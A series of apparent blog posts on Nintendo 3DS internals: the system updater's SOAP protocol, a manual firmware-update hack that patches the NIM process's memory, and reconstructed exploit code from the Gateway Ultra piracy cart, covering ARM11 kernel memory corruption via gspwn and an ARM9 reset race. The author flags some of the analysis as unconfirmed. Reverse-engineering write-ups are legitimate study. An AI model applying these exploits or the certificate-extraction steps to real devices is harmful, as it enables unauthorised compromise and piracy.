Nintendo 3DS System Updater

Since there isn’t much public documentation on how 3DS updater and the NIM module works, I thought I should write something up.

SSL

The 3DS talks with the Nintendo update servers (as well as eShop) through SSL with a client certificate that is common to all 3DS. The client certificate, its private key, and the Nintendo root CA are found in the title 0004001B00010002. The two files found inside the title’s RomFS are additionally encrypted. The SSL system module decrypts the files and stores it into the process heap. The certificate, key, and root CA are all stored in DER format, so you may want to convert it to a PKCS12 format before using it to communicate with NUS on your own.

NIM

The NIM module is how the 3DS communicates with Nintendo’s servers through SOAP (and over SSL). The following is a typical update process.

The following request is made to https://nus.c.shop.nintendowifi.net/nus/services/NetUpdateSOAP (potentially identifying information is stripped out)

POST /nus/services/NetUpdateSOAP HTTP/1.1
User-Agent: CTR NUP 040600 Mar 14 2012 13:32:39
Connection: Keep-Alive
Accept-Charset: UTF-8
Content-type: text/xml; charset=utf-8
SOAPAction: urn:nus.wsapi.broadon.com/GetSystemTitleHash
com.broadon.RequesterName: unitTest
com.broadon.RequesterHash: zzz
com.broadon.RequesterTimestamp: 1427146068799
Transfer-Encoding: chunked

<?xml version=”1.0″ encoding=”UTF-8″?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV=”http://schemas.xmlsoap.org/soap/envelope/”
xmlns:SOAP-ENC=”http://schemas.xmlsoap.org/soap/encoding/”
xmlns:xsi=”http://www.w3.org/2001/XMLSchema-instance”
xmlns:xsd=”http://www.w3.org/2001/XMLSchema”
xmlns:nus=”urn:nus.wsapi.broadon.com”>
<SOAP-ENV:Body>
<nus:GetSystemTitleHash xsi:type=”nus:GetSystemTitleHashRequestType”>
<nus:Version>1.0</nus:Version>
<nus:MessageId>EC-xxx-142714927</nus:MessageId>
<nus:DeviceId>xxx</nus:DeviceId>
<nus:RegionId>JPN</nus:RegionId>
<nus:CountryCode>JP</nus:CountryCode>
</nus:GetSystemTitleHash>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>

Since the 3DS firmware is a collection of “titles” that can be updated independently, the updater has to make sure each title is up to date. To save time, it first gets a hash and checks if anything needs to be updated. The server responds:

<soapenv:Envelope xmlns:soapenv=”http://schemas.xmlsoap.org/soap/envelope/” xmlns:xsd=”http://www.w3.org/2001/XMLSchema” xmlns:xsi=”http://www.w3.org/2001/XMLSchema-instance”>
<soapenv:Body>
<GetSystemTitleHashResponse xmlns=”urn:nus.wsapi.broadon.com”>
<Version>1.0</Version>
<DeviceId>xxx</DeviceId>
<MessageId>EC-xxx-154274329</MessageId>
<TimeStamp>1427146232957</TimeStamp>
<ErrorCode>0</ErrorCode>
<TitleHash>7E745F7B67D553BEA847859404790C93</TitleHash>
</GetSystemTitleHashResponse>
</soapenv:Body>
</soapenv:Envelope>

If the title hash matches the current system’s hash, then the updater exits. Otherwise, it continues and makes a request to https://ecs.c.shop.nintendowifi.net/ecs/services/ECommerceSOAP to get the latest update server URLs

POST /ecs/services/ECommerceSOAP HTTP/1.1
User-Agent: CTR NUP 040600 Mar 14 2012 13:32:39
Connection: Keep-Alive
Accept-Charset: UTF-8
Content-type: text/xml; charset=utf-8
SOAPAction: urn:ecs.wsapi.broadon.com/GetAccountStatus
com.broadon.RequesterName: unitTest
com.broadon.RequesterHash: zzz
com.broadon.RequesterTimestamp: 1427146232982
Transfer-Encoding: chunked
Host: ecs.c.shop.nintendowifi.net

<?xml version=”1.0″ encoding=”UTF-8″?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV=”http://schemas.xmlsoap.org/soap/envelope/”
xmlns:SOAP-ENC=”http://schemas.xmlsoap.org/soap/encoding/”
xmlns:xsi=”http://www.w3.org/2001/XMLSchema-instance”
xmlns:xsd=”http://www.w3.org/2001/XMLSchema”
xmlns:ecs=”urn:ecs.wsapi.broadon.com”>
<SOAP-ENV:Body>
<ecs:GetAccountStatus xsi:type=”ecs:GetAccountStatusRequestType”>
<ecs:Version>2.0</ecs:Version>
<ecs:MessageId>EC-xxx-143998661</ecs:MessageId>
<ecs:DeviceId>xxx</ecs:DeviceId>
<ecs:DeviceToken>yyy</ecs:DeviceToken>
<ecs:AccountId>yyy</ecs:AccountId>
<ecs:ApplicationId>0004013000002c02</ecs:ApplicationId>
<ecs:TIN>1234</ecs:TIN>
<ecs:Region>JPN</ecs:Region>
<ecs:Country>JP</ecs:Country>
<ecs:Language>ja</ecs:Language>
<ecs:SerialNo>zzz</ecs:SerialNo>
<ecs:ECVersion>EC 4.6.0 Mar 14 2012 13:32:39</ecs:ECVersion><ecs:Locale>ja_JP</ecs:Locale><ecs:ServiceLevel>SYSTEM</ecs:ServiceLevel>
</ecs:GetAccountStatus>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>

and the server responds with the URLs to use

<?xml version=”1.0″ encoding=”UTF-8″?>
<soapenv:Envelope xmlns:soapenv=”http://schemas.xmlsoap.org/soap/envelope/” xmlns:xsd=”http://www.w3.org/2001/XMLSchema” xmlns:xsi=”http://www.w3.org/2001/XMLSchema-instance”>
<soapenv:Body>
<GetAccountStatusResponse xmlns=”urn:ecs.wsapi.broadon.com”>
<Version>2.0</Version>
<DeviceId>xxx</DeviceId>
<MessageId>EC-xxx-121712521</MessageId>
<TimeStamp>1427134562983</TimeStamp>
<ErrorCode>0</ErrorCode>
<ServiceStandbyMode>false</ServiceStandbyMode>
<AccountStatus>R</AccountStatus>
<ServiceURLs>
<Name>ContentPrefixURL</Name>
<URI>http://ccs.cdn.c.shop.nintendowifi.net/ccs/download</URI>
</ServiceURLs>
<ServiceURLs>
<Name>UncachedContentPrefixURL</Name>
<URI>https://ccs.c.shop.nintendowifi.net/ccs/download</URI>
</ServiceURLs>
<ServiceURLs>
<Name>SystemContentPrefixURL</Name>
<URI>http://nus.cdn.c.shop.nintendowifi.net/ccs/download</URI>
</ServiceURLs>
<ServiceURLs>
<Name>SystemUncachedContentPrefixURL</Name>
<URI>https://ccs.c.shop.nintendowifi.net/ccs/download</URI>
</ServiceURLs>
<ServiceURLs>
<Name>EcsURL</Name>
<URI>https://ecs.c.shop.nintendowifi.net/ecs/services/ECommerceSOAP</URI>
</ServiceURLs>
<ServiceURLs>
<Name>IasURL</Name>
<URI>https://ias.c.shop.nintendowifi.net/ias/services/IdentityAuthenticationSOAP</URI>
</ServiceURLs>
<ServiceURLs>
<Name>CasURL</Name>
<URI>https://cas.c.shop.nintendowifi.net/cas/services/CatalogingSOAP</URI>
</ServiceURLs>
<ServiceURLs>
<Name>NusURL</Name>
<URI>https://nus.c.shop.nintendowifi.net/nus/services/NetUpdateSOAP</URI>
</ServiceURLs>
</GetAccountStatusResponse>
</soapenv:Body>
</soapenv:Envelope>

Now, NIM sends the full list of title versions on the system as the next request to the SOAP server defined in NusURL.

<SOAP-ENV:Envelope xmlns:SOAP-ENV=”http://schemas.xmlsoap.org/soap/envelope/” xmlns:SOAP-ENC=”http://schemas.xmlsoap.org/soap/encoding/” xmlns:xsi=”http://www.w3.org/2001/XMLSchema-instance” xmlns:xsd=”http://www.w3.org/2001/XMLSchema” xmlns:nus=”urn:nus.wsapi.broadon.com”>
<SOAP-ENV:Body>
<nus:GetSystemUpdate xsi:type=”nus:GetSystemUpdateRequestType”>
<nus:Version>1.0</nus:Version>
<nus:MessageId>EC-xxx-147358457</nus:MessageId>
<nus:DeviceId>xxx</nus:DeviceId>
<nus:RegionId>JPN</nus:RegionId>
<nus:CountryCode>JP</nus:CountryCode>
<nus:Language>ja</nus:Language>
<nus:SerialNo>zzz</nus:SerialNo>
<nus:TitleVersion>
<nus:TitleId>1126106602178562</nus:TitleId>
<nus:Version>10</nus:Version>
</nus:TitleVersion>

<nus:TitleVersion>
<nus:TitleId>1126106065308162</nus:TitleId>
<nus:Version>7168</nus:Version>
</nus:TitleVersion>
</nus:GetSystemUpdate>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>

The server responds with the versions and metadata of all the titles corresponding to the device type and region.

<soapenv:Envelope xmlns:soapenv=”http://schemas.xmlsoap.org/soap/envelope/” xmlns:xsd=”http://www.w3.org/2001/XMLSchema” xmlns:xsi=”http://www.w3.org/2001/XMLSchema-instance”>
<soapenv:Body>
<GetSystemUpdateResponse xmlns=”urn:nus.wsapi.broadon.com”>
<Version>1.0</Version>
<DeviceId>xxx</DeviceId>
<MessageId>1</MessageId>
<TimeStamp>1414627502761</TimeStamp>
<ErrorCode>0</ErrorCode>
<ContentPrefixURL>http://nus.cdn.c.shop.nintendowifi.net/ccs/download</ContentPrefixURL>
<UncachedContentPrefixURL>https://ccs.c.shop.nintendowifi.net/ccs/download</UncachedContentPrefixURL>
<TitleVersion>
<TitleId>0004001000021000</TitleId>
<Version>8203</Version>
<FsSize>4931584</FsSize>
<TicketSize>848</TicketSize>
<TMDSize>4708</TMDSize>
</TitleVersion>

<TitleVersion>
<TitleId>0004013820000202</TitleId>
<Version>4816</Version>
<FsSize>1032192</FsSize>
<TicketSize>848</TicketSize>
<TMDSize>4660</TMDSize>
</TitleVersion>
<UploadAuditData>1</UploadAuditData>
<TitleHash>7E745F7B67D553BEA847859404790C93</TitleHash>
</GetSystemUpdateResponse>
</soapenv:Body>
</soapenv:Envelope>

If any titles are new to the system, NIM will request to get the common ticket for those titles.

<SOAP-ENV:Envelope xmlns:SOAP-ENV=”http://schemas.xmlsoap.org/soap/envelope/” xmlns:SOAP-ENC=”http://schemas.xmlsoap.org/soap/encoding/” xmlns:xsi=”http://www.w3.org/2001/XMLSchema-instance” xmlns:xsd=”http://www.w3.org/2001/XMLSchema” xmlns:nus=”urn:nus.wsapi.broadon.com”>
<SOAP-ENV:Body>
<nus:GetSystemCommonETicket xsi:type=”nus:GetSystemCommonETicketRequestType”>
<nus:Version>1.0</nus:Version>
<nus:MessageId>EC-xxx-170576756</nus:MessageId>
<nus:DeviceId>xxx</nus:DeviceId>
<nus:RegionId>JPN</nus:RegionId>
<nus:CountryCode>JP</nus:CountryCode>
<nus:Language>ja</nus:Language>
<nus:SerialNo>zzz</nus:SerialNo>
<nus:TitleId>0004001000021000</nus:TitleId>

<nus:TitleId>000400DB20016302</nus:TitleId>
</nus:GetSystemCommonETicket>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>

The server returns base64 encoded tickets for each title. It also returns a certificate chain for the tickets. As an aside, common tickets are used to sign firmware components. Regular games use tickets tied to a specific account (not “common”).

<soapenv:Envelope xmlns:soapenv=”http://schemas.xmlsoap.org/soap/envelope/” xmlns:xsd=”http://www.w3.org/2001/XMLSchema” xmlns:xsi=”http://www.w3.org/2001/XMLSchema-instance”>
<soapenv:Body>
<GetSystemCommonETicketResponse xmlns=”urn:nus.wsapi.broadon.com”>
<Version>1.0</Version>
<DeviceId>xxx</DeviceId>
<MessageId>EC-xxx-244400570</MessageId>
<TimeStamp>1427142110949</TimeStamp>
<ErrorCode>0</ErrorCode>
<CommonETicket>…</CommonETicket>

<CommonETicket>…</CommonETicket>
<Certs>…</Certs>
<Certs>…</Certs>
</GetSystemCommonETicketResponse>
</soapenv:Body>
</soapenv:Envelope>

Now, the system is ready to download the updated titles. For each title in the GetSystemUpdateResponse, if the version is higher than the current installed version, NIM first gets the title metadata from the ContentPrefixURL. For example, downloading version 8203 of title 0004001000021000 will be from: http://ccs.cdn.c.shop.nintendowifi.net/ccs/download/0004001000021000/tmd.8203?deviceId=xxx&accountId=zzz

It then parses the title metadata, which contains a list of content archives to download. For the example above, it will download http://nus.cdn.c.shop.nintendowifi.net/ccs/download/0004001000021000/00000043 and http://nus.cdn.c.shop.nintendowifi.net/ccs/download/0004001000021000/00000045

Once all the titles are downloaded, it makes another GetSystemTitleHash request (presumably to check if there’s an update released while the device was being updated).

More Information

For more information on downloading titles from Nintendo CDN, check out Rely’s CDN downloader script. For more information on talking with Nintendo’s SOAP servers, check out yellows8’s ninupdates (you need the client certificate and key from the SSL module as described above) or his update reports. These tools were indispensable for figuring out the updater.

Appendix: Updating N3DS 8.1.0-0J to 9.2.0-20J

The motivation behind figuring out how the update process worked was so I could manually update my Japanese N3DS from the stock 8.1 (which does not support ninjhax) to 9.2 (the last version that supports ninjhax). I’ll quickly describe how it is done, but since the process is a bit involved, I would not recommend anyone not experienced to try it (you can easily brick/update to the latest version). I only attempted this on a Japan N3DS on 8.1.0-0J to 9.2.0-20J, but it should work with other configurations provided you get the right files and offsets.

Prerequisites

  • Cubic Ninja
  • NTR CFW 2.0 and NTR Debugger
  • A web server with support for some kind of scripting language (PHP for example)
  • Clear any pending update by entering recovery mode and exiting (I don’t think this is needed but better safe than sorry)

Steps

  1. Host the SOAP response for the version you want to update to on your web server. You can find all the raw SOAP responses from yellows8’s update report site. For example, here is the one for 9.1.0-20J. According to yellows8, there was a bug and his bot did not capture 9.2.0-20J. However, since there was only two titles changed in that update, I just manually crafted a 9.2.0-20J response.
  2. Host the SOAP response for the update title hash. Here is the template. You need to change the value of the TitleHash to match the TitleHash at the end of your update response from step 1.
  3. Create a script that responds with one of the two SOAP responses above depending if the request header is for “urn:nus.wsapi.broadon.com/GetSystemUpdate” or “SOAPAction: urn:nus.wsapi.broadon.com/GetSystemTitleHash”. I made a two lined PHP script called “update.php” that does this.
  4. Host the SOAP response for getting the server URLs. The template for this is here. You only need to change the value of NusURL to point to your NUS responder script created in step 3. (In my case, it would be http://myhost.com/update.php)
  5. Boot your 3DS into NTR CFW 2.0 and connect the debugger
  6. Use listprocess() to get the PID for “nim”. On 8.1.0-0J, it should be 0x25.
  7. Patch NIM to use your server for NetUpdateSOAP (this offset is for 8.1.0-0J): write(0x15E424, tuple(map(ord, “http://myhost.com/update.php\0″)), pid=0x25)
  8. Patch NIM to use your server for ECommerceSOAP. Since you’re only responding to GetAccountStatus, it is okay to hard code this: write(0x15E0EC, tuple(map(ord, “http://myhost.com/GetAccountStatus_response.xml\0″)), pid=0x25)
  9. Do the same for another reference to ECommerceSOAP: write(0x15E463, tuple(map(ord, “http://myhost.com/GetAccountStatus_response.xml\0″)), pid=0x25)
  10. Go into system settings, and perform an update (do NOT exit system settings as you will lose your patches and will have to perform them again after restarting).
  11. Once the update is done, you will be prompted to restart, however because you are in NTR mode, the screen will just go black. You need to hold the power button and manually restart.

Reversing Gateway Ultra Stage 3: Owning ARM9 Kernel

First, some background: the 3DS has two main processors. Last time, I went over how Gateway Ultra exploited the ARM11 processor. However, most of the interesting (from a security perspective) functionalities are handled by a separate ARM946 processor. The ARM9 processor is in charge of the initial system bootup, some system services, and most importantly all the cryptographic functions such as encryption/decryption and signature/verification. In this post, we will look at how to run (privileged) code on the ARM9 processor with privileged access to the ARM11 processor. Please note that this writeup is a work in progress as I have not completely figured out how the exploit works (only the main parts of it). Specifically there are a couple of things that I do not know if it is done for the sake of the exploit or if it is done purely for stability or obfuscation. From a developer’s perspective, it doesn’t matter because as long as you perform all the steps, you will achieve code execution. But from a hacker’s perspective, the information is not complete unless all aspects are known and understood. I am posting this now as-is because I do not know when I’ll have time to work on the 3DS again. However, when I do, I will update the post and hopefully clear up all confusion.

Code

For simplicity in description, from this point on, I will use pointers and offset values specific to the 4.x kernel. However, the code is the same for all firmware versions.

void arm11_kernel_entry(void) // pointers specific to 4.x
{
  int (*sub_FFF748C4)(int, int, int, int) = 0xFFF748C4;

  __clrex(); // release any exclusive access
  memcpy(0xF3FFFF00, 0x08F01010, 0x1C);// copy GW specific data
  invalidate_dcache();
  invalidate_icache();
  clear_framebuffer(); // clear screen and saves some GPU registers
  // ARM9 code copied to FCRAM 0x23F00000
  memcpy(0xF3F00000, ARM9_PAYLOAD, ARM9_PAYLOAD_LEN);
  // write function hook at 0xFFFF0C80
  memcpy(0xEFFF4C80, jump_table, FUNC_LEN);
  // write FW specific offsets to copied code buffer
  *(int *)(0xEFFF4C80 + 0x60) = 0xFFFD0000; // PDN regs
  *(int *)(0xEFFF4C80 + 0x64) = 0xFFFD2000; // PXI regs
  *(int *)(0xEFFF4C80 + 0x68) = 0xFFF84DDC; // where to return to from hook
  // patch function 0xFFF84D90 to jump to our hook
  *(int *)(0xFFF84DD4 + 0) = 0xE51FF004; // ldr pc, [pc, #-4]
  *(int *)(0xFFF84DD4 + 4) = 0xFFFF0C80; // jump_table + 0
  // patch reboot start function to jump to our hook
  *(int *)(0xFFFF097C + 0) = 0xE51FF004; // ldr pc, [pc, #-4]
  *(int *)(0xFFFF097C + 4) = 0x1FFF4C84; // jump_table + 4
  invalidate_dcache();
  sub_FFF748C4(0, 0, 2, 0); // trigger reboot
}

// not called directly, offset determines jump
void jump_table(void)
{
  func_patch_hook();
  reboot_func();
}

void func_patch_hook(void)
{
  // data written from entry
  int pdn_regs;
  int pxi_regs;
  int (*func_hook_return)(void);

  // save context
  __asm__ ("stmfd sp!, {r0-r12,lr}")
  // TODO: Why is this needed?
  pxi_send(pxi_regs, 0);
  pxi_sync(pxi_regs);
  pxi_send(pxi_regs, 0x10000);
  pxi_recv(pxi_regs);
  pxi_recv(pxi_regs);
  pxi_recv(pxi_regs);
  // TODO: What does this do?
  *(char *)(pdn_regs + 0x230) = 2;
  for (i = 0; i < 16; i += 2); // busy spin
  *(char *)(pdn_regs + 0x230) = 0;
  for (i = 0; i < 16; i += 2); // busy spin
  // restore context and run the two instructions that were replaced
  __asm__ ("ldmfd sp!, {r0-r12,lr}\t\n"
           "ldr r0, =0x44836\t\n"
           "str r0, [r1]\t\n"
           "ldr pc, %0", func_hook_return);
}

// this is a patched version of function 0xFFFF097C
// stuff found in the original code are skipped
void reboot_func(void)
{
  ... // setup
  // disable all interrupts
  __asm__ ("mrs r0, cpsr\t\n"
           "orr r0, r0, #0x1C0\t\n"
           "msr cpsr_cx, r0" ::: "r0");
  while ( *(char *)0x10140000 & 1 ); // wait for powerup ready
  *(void **)0x2400000C = 0x23F00000; // our ARM9 payload
  ...
}

Memory Configurations

A quick side-note on the way that ARM11 talks to ARM9. There is a FIFO with a register interface called the PXI and is used to pass data to and from each processor. Additionally, most of the physical memory mappings are shared between the two processors. Data stored, for example, in the FCRAM or AXI WRAM can be seen by both processors (provided proper cache coherency). However, there is one region (physical 0x08000000 to 0x081000000) that only the ARM9 processor can see. ARM9 code runs in this region. Another thing to note is that the ARM9 processor only performs a one-to-one virtual memory addressing (aka physical addresses and virtual addresses are the same) but I have been told that it does have memory protection enabled.

ARM9 Process

The ARM9 processor only (ever) has one process running, Process9, which speaks with the kernel to handle commands from ARM11. Process9 has access to a special syscall 0x7B, which takes in a function pointer and executes it in kernel mode. This means that essentially, owning ARM9 usermode is enough to get kernel code execution without any additional exploits.

Exploit Setup

After doing some housekeeping, the first thing the second stage payload code does is copy the third stage ARM9 code to a known location in FCRAM. Next, it makes patches to two ARM11 kernel functions. First, it patches the function at 0xFFF84D90 (I believe this function performs the kernel reboot) to jump into a function hook early-on. Second, it patches the function at 0xFFFF097C (I believe this function is ran after the ARM11 processor resets) to jump into another function hook. These two hooks are the key to how the exploit works.

Soft Rebooting

The 3DS supports soft rebooting (resetting the processor state without clearing the memory) in order to switch modes (ex: for DS games) and presumably to enable entering and exiting sleep mode. I believe this is triggered at the end of the the exploit setup by calling the function at 0xFFF748C4. At some point in this function, the subroutine at 0xFFF84D90 is called, which runs the code in our first function hook before continuing the execution.

At the same time in the ARM9 processor, Process9 now waits for a special command, 0x44836 from PXI, in the function at 0x0807B97C. I believe that the first function hook in ARM11 sends a series to commands to put Process9 into function 0x0807B97C, however that is only a guess.

The ARM11 processor continues to talk with ARM9 through the PXI and at some point both agree on a shared buffer in FCRAM at 0x24000000 (EDIT: yellows8 says this is the FIRM header) where some information is stored. At 0x2400000C is a function pointer to what ARM9 should execute after the reset. Process9 verifies that this function pointer is in the ARM9 private memory region 0x08000000-0x08100000 (EDIT: I assume the FIRM header signature check also takes place at this point). ARM11 resets and spinlocks in the function at 0xFFFF097C to wait for ARM9 to finish its tasks and tell ARM11 what to do.

Process9 at this point uses SVC 0x7B to jump into some reset handler at 0x080FF600 in kernel mode. At the end of that function, the ARM9 kernel reads the pointer value at 0x2400000C and jumps to it.

Reset ToCTToU

The problem here is simple. Process9 checks that the data at 0x2400000C (which is FCRAM, shared by both processors) is a valid pointer to code in ARM9 private memory (that ARM11 cannot access). However, after the check passes and before the function pointer is used, ARM11 can overwrite the value to point to code in FCRAM and ARM9 will execute it when it resets. This time-of-check-to-time-of-use bug is made possible by patching the ARM11 function that runs after reset so that it can wait for the right signal and then quickly overwrite the data in FCRAM before ARM9 uses it.

Conclusions

I apologize for the vagueness and likely mistakes in parts. I hope that if I don’t have the time to finish this analysis, someone else can pick up where I left off. Specifically, there are a couple of main questions that I haven’t answered:

  1. What is the function at 0xFFF748C4, what do the arguments do, and how does it call into function 0xFFF84D90? I speculate that it’s a function that performs the reset, but a more precise description is needed.
  2. What is the purpose of the first function hook? Specifically why does it send 0 and 0x10000 through PXI and what does PDN register 0x230 do?
  3. How does Process9 enter function 0x0807B97C? I suspect that it may have something to do with the first function hook in ARM11.

I hope that either someone can answer these questions (as well as correct any mistakes I’ve made) or that I’ll have time in the future to continue this analysis. This will also be the end of my journey to reverse Gateway Ultra (but the next release may spark my interest again). I don’t particularly care about the later stages (I hear there’s a modified MIPS VM and timing based obfuscation) or how Gateway enforces DRM to make sure only their card is used. If I do any more reversing with the 3DS, it would be on the kernel and applications so I can make patches of my own instead of worrying about how Gateway does it.

At this point, the information should be enough for anyone to take complete control of the 3DS (<= 9.2.0). I believe that information on its own is amoral but it takes people to make it immoral. There’s no point in arguing if piracy is right or wrong or if making this information public would help or harm pirates. I am not here to ensure the 3DS thrives. I am not here to take business away from Gateway. I am not here to be a moral police. I am only here to make sure that information is available for those who thirst for knowledge as much as I do in a form that is as precise and accurate as I can make it.

Reversing Gateway Ultra Stage 2: Owning ARM11 Kernel

It’s been a couple of days since my initial analysis of Gateway Ultra, released last week to enable piracy on 3DS. I spent most of this time catching up on the internals of the 3DS. I can’t thank the maintainers of 3dbrew enough (especially yellows8, the master of 3DS reversing) for the amount of detailed and technical knowledge found on the wiki. The first stage was a warmup and did not require any specific 3DS knowledge to reverse. The problem with the second stage is that while it is easy to see the exploit triggered and code to run, the actual exploit itself was not as clear. I looked at all the function calls made and made a couple of hypothesis of where the vulnerability resided, and reversed each function to the end to test my hypothesis. Although there was many dead ends and false leads, the process of reversing all these functions solidified my understanding of the system.

Code

As always, I like to post the reversed code first so those with more knowledge than me don’t have to read my verbose descriptions. I will explain the interesting parts afterwards. I am including the full code listing of the shellcode including parts that are irrelevant either because it is used as obfuscation, to provide stability, or as setup for later parts.

int memcpy(void *dst, const void *src, unsigned int len);
int GX_SetTextureCopy(void *input_buffer, void *output_buffer, unsigned int size, 
                      int in_x, int in_y, int out_x, int out_y, int flags);
int GSPGPU_FlushDataCache(void *addr, unsigned int len);
int svcSleepThread(unsigned long long nanoseconds);
int svcControlMemory(void **outaddr, unsigned int addr0, unsigned int addr1, 
                     unsigned int size, int operation, int permissions);

int
do_gspwn_copy (void *dst, unsigned int len, unsigned int check_val, int check_off)
{
    unsigned int result;

    do
    {
        memcpy (0x18401000, 0x18401000, 0x10000);
        GSPGPU_FlushDataCache (0x18402000, len);
        // src always 0x18402000
        GX_SetTextureCopy(0x18402000, dst, len, 0, 0, 0, 0, 8);
        GSPGPU_FlushDataCache (0x18401000, 16);
        GX_SetTextureCopy(dst, 0x18401000, 0x40, 0, 0, 0, 0, 8);
        memcpy(0x18401000, 0x18401000, 0x10000);
        result = *(unsigned int *)(0x18401000 + check_off);
    } while (result != check_val);

    return 0;
}

int
arm11_kernel_exploit_setup (void)
{
    unsigned int patch_addr;
    unsigned int *buffer;
    int i;
    int (*nop_func)(void);
    int *ipc_buf;
    int model;

    // part 1: corrupt kernel memory
    buffer = 0x18402000;
    // 0xFFFFFE0 is just stack memory for scratch space
    svcControlMemory(0xFFFFFE0, 0x18451000, 0, 0x1000, 1, 0); // free page
    patch_addr = *(int *)0x08F028A4;
    buffer[0] = 1;
    buffer[1] = patch_addr;
    buffer[2] = 0;
    buffer[3] = 0;
    // overwrite free pointer
    do_gspwn_copy(0x18451000, 0x10u, patch_addr, 4);
    // trigger write to kernel
    svcControlMemory(0xFFFFFE0, 0x18450000, 0, 0x1000, 1, 0);

    // part 2: obfuscation or trick to clear code cache
    for (i = 0; i < 0x1000; i++)
    {
        buffer[i] = 0xE1A00000; // ARM NOP instruction
    }
    buffer[i-1] = 0xE12FFF1E; // ARM BX LR instruction
    nop_func = *(unsigned int *)0x08F02894 - 0x10000; // 0x10000 below current code
    do_gspwn_copy(*(unsigned int *)0x08F028A0 - 0x10000, 0x10000, 0xE1A00000, 0);
    nop_func ();

    // part 3: get console model for future use (?)
    __asm__ ("mrc p15,0,%0,c13,c0,3\t\n"
             "add %0, %0, #128\t\n" : "=r" (ipc_buf));

    ipc_buf[0] = 0x50000;
    __asm__ ("mov r4, %0\t\n"
             "mov r0, %1\t\n"
             "ldr r0, [r0]\t\n"
             "svc 0x32\t\n" :: "r" (ipc_buf), "r" (0x3DAAF0) : "r0", "r4");

    if (ipc_buf[1])
    {
        model = ipc_buf[2] & 0xFF;
    }
    else
    {
        model = -1;
    }
    *(int *)0x8F01028 = model;

    return 0;
}

// after running setup, run this to execute func in ARM11 kernel mode
int __attribute__((naked))
arm11_kernel_exploit_exec (int (*func)(int, int, int), int arg1, int arg2)
{
    __asm__ ("mov r5, %0\t\n" // R5 = 0x3D1FFC, not used. likely obfusction.
             "svc 8\t\n" // CreateThread syscall, corrupted, args not needed
             "bx lr\t\n" :: "r" (0x3D1FFC) : "r5");
}

Vulnerability

The main vulnerability is actually still gspwn. Whereas in the first stage, it was used to overwrite (usually read-only) code from a CRO dynamic library to get userland code execution, it is now used to overwrite a heap free pointer so when the next memory page is freed, it would overwrite kernel memory.

3DS Memory Layout

To understand how the free pointer write corruption works, let’s first go over how the 3DS memory is laid out (in simple terms). You can get the full picture here, but I want to go over some key points. First, the “main” memory (used by applications and services) called the FCRAM is located at physical address 0x20000000 to 0x28000000. It is mapped in virtual memory in many places. First, the main application which is at around FCRAM 0x23xxxxxx (or higher if it is a system process or applet like the web browser) is mapped to 0x00100000 as read-only. Next we have some pages in the FCRAM 0x24xxxxxx region that can be mapped by the application on demand to virtual address 0x18xxxxxx through the syscall ControlMemory. Finally, the entire FCRAM is mapped in kernel 0xF0000000 – 0xF8000000 (this is for 4.1, different in other versions).

Another note about memory is that the ARM11 kernel is not located in the FCRAM, but in something called the AXI WRAM. The name is not important, but what is important is that it’s physical address 0x1FF80000 is mapped twice in kernel memory space. 0xFFF60000 is marked read-only executable and 0xEFF80000 is marked read-write non-executable. However, writing to 0xEFF80000 will allow you to execute the code at 0xFFF60000, which defeats the whole purpose of marking the pages non-executable. Since these mappings only apply in kernel mode, you would still need to perform a write to that address with kernel permissions.

ControlMemory Unchecked Write

The usual process for handling user controlled pointers in a syscall is to use the special ARM instructions LDRT and STRT, which performs the pointer dereference with user privileges in kernel mode. However, what if we overwrite a pointer that the developers did not think is user controlled? It would use the regular LDR/STR instructions and dereference with kernel privileges. The goal is achieved by the ControlMemory syscall along with gspwn. The ControlMemory syscall is used to allocate and free pages of memory from the heap region of the FCRAM. When it is called to free, like most heap allocators, certain pointers are stored in the newly freed memory block (to point to the next and previous free blocks). Like most heap allocators, it also performs “coalescing,” which means two free blocks will be combined to form a larger free block (and the pointers to and from it is updated accordantly).

The plan here is to free a block of memory, which places certain pointers in the freed block. This is usually safe since once the user frees the block, it is unmapped from the user virtual memory space and they cannot access the memory any more. However, we can with gspwn, so we overwrite the free pointer with gspwn to overwrite the code in the 0xEFF80000 region. And that is possible because the pointer dereference is done with kernel permissions because the pointers stored here is not normally user accessible.

The data stored in the freed region is as follows:

struct
{
    int some_count;
    struct free_data *next_free_block;
    struct free_data *prev_free_block;
    int unk_C;
    int unk_10;
} free_data;

When the first ControlMemory call happens in the exploit, it frees FCRAM 0x24451000 and writes the free_data structure to it. We then use gspwn to overwrite next_free_block to point to the kernel code we want to overwrite. Next we call ControlMemory to free the page immediately before (FCRAM 0x24450000). This will coalesce the block with

((struct free_data *)0x24450000)->next_free_block = ((struct free_data *)0x24451000)->next_free_block;
((struct free_data *)0x24451000)->next_free_block->prev_free_block = (struct free_data *)0x24450000;

As you can see, we control next_free_block of 0x24451000 and therefore control the write.

… But we’re not done yet. The above pseudocode was an artist rendition of what happens. Obviously, physical addresses are not used here. The user region virtual address (0x18xxxxxx) is not used either. The pointers here are the kernel virtual address 0xF4450000 and 0xF4451000. Since we can only write the value 0xF4450000 (or on 9.2, it is 0xE4450000), this poses a problem. Ideally, we want to write some ARM instruction that allows us to jump to code we control (BX R0 for example), however, 0xF4450000 assembles to “vst4.8{d16-d19}, [r5], r0″ (don’t worry, I don’t know what that is either) and 0xE4450000 assembles to “strb r0, [r5], #-0″. Both of which can’t be used (obviously) to control code execution. Now of course, we can try another address and see if we get lucky and the address happens to compile to a branch instruction, but we are not lucky. None of the user mappable/unmappable regions would give us a branch.

Unaligned Code Corruption

Here is the clever idea. What if we stop thinking of the problem as: how do I write an instruction that gives us execution control? but instead as: how do I corrupt the code to control it? I don’t usually like to post assembly listings, but it is impossible to dodge ARM assembly if you made it this far.

A note to systems programmers: There is a feature of ARMv6 that the 3DS enabled called unaligned read/write. This means a pointer does NOT have to be word aligned. In other words, you are allowed to write 4 bytes arbitrary to any address including something like “0x1003″. Now if you’re not a systems designer and don’t know about the problem of unaligned reads/writes (C nicely hides this from you), don’t worry, it just means everything works as you expect it to.

Let’s take a look at an arbitrary syscall, CreateThread. The actual syscall doesn’t matter, we only care about the assembly code that it runs:

   0:	e52de004 	push	{lr}		; (str lr, [sp, #-4]!)
   4:	e24dd00c 	sub	sp, sp, #12
   8:	e58d4004 	str	r4, [sp, #4]
   c:	e58d0000 	str	r0, [sp]
  10:	e28d0008 	add	r0, sp, #8
